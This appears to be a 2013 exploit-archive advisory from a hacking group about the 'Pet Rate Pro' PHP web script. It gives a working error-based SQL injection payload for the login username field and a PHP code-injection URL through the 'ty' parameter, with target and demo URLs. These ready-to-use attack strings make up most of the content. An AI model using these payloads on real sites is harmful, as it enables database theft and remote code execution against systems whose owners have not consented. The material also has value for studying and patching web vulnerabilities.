[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Scripts Genie Pet Rate Pro - Multiple Vulnerabilities
# Published : 2013-02-18
# Author :
# Previous Title : OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability
# Next Title : TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities
#########################################################################
# __ .__ .__ #
# |__|____ ____ |__| ______ ___________ _______|__| ____ ______ #
# | __ / | |/ ___// ___/__ \_ __ |/ __ / ___/ #
# | |/ __ | | |___ ___ / __ | | / ___/ ___ #
#/__| (____ /___| /__/____ >____ >(____ /__| |__|___ >____ > #
#______| / / / / / / / #
# www.janissaries.org #
##=====================================================================##
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
???:??? Pet Rate Pro Multi Vulnerability ???:???
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit : Pet Rate Pro Multi Vulnerability
./WebApps URL :http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=pet_rate_pro
./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com.com ] [ All Janissaries ]
./Security Risk : [ High Level ]
./Category XPL : [ WebApps]
./Time & Date : 18.02.2013. 09:50 PM.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#################################################################################
#
# #=> Exploit: SQL injection
# http://[target]/[path]//demo/PetRatePro/index.php?cmd=4
# Demo:
# URL encoded POST input username was set to
# 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(82),CHAR(65),CHAR(101),CHAR(74),CHAR(100),CHAR(109),CHAR(55)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
#
# #=> Exploit: Code Ynjection
#
# http://[target]/[path]/index.php?cmd=10&ty="%3bprint(TheMirkin_janissaries_Pentester)%3b%24a%3d"
# Demo:
# http://server/index.php?cmd=10&ty=%22%3bprint%28TheMirkin_janissaries_Pentester%29%3b%24a%3d%22
#
# xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx #
# Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
#################################################################################